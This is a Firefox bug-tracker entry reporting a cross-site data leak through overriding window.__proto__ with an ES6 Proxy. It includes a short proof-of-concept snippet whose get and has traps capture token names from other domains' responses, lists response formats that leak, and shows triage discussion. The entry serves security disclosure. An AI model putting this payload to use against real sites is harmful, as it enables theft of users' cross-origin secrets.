Cross-site data leak using window.__proto__ = new Proxy

RESOLVED DUPLICATE of bug 1048535

Status

()

RESOLVED DUPLICATE of bug 1048535
4 years ago
4 years ago

People

(Reporter: till, Unassigned)

Tracking

({sec-moderate, wsec-disclosure})

Trunk
sec-moderate, wsec-disclosure
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

(URL)

(Reporter)

Description

4 years ago
Setting window.__proto__, it's possible to intercept data from other domains as long as the data consists of either a single token that's a valid JS identifier, or a list of such tokens.

See https://twitter.com/steike/status/533198334547468288 for a POC.

It's actually even simpler to implement this using ES6-style proxies:

window.__proto__ = new Proxy({}, {
    get: function(target, name) {console.log(name); return true;},
    has: function(target, name) {return true}
});

Examples of request results this works for:
"foo05120820e156c2f445f670759be64420" (from the original POC)
"foo,bar"
foo,
bar,
baz"
"foo;bar"
Calling this sec-moderate (maybe even sec-low?, because it relies on a web app that is not securing its "secret tokens" in a best practice way.

Dan, can you think of something we could do about this?
Keywords: sec-moderate, wsec-disclosure
Status: NEW → RESOLVED
Last Resolved: 4 years ago
Resolution: --- → DUPLICATE
Duplicate of bug: 1048535
This bug has been marked as a duplicate of a restricted bug.
If it's an exact duplicate, we should consider opening up bug 1048535.
You need to log in before you can comment on or make changes to this bug.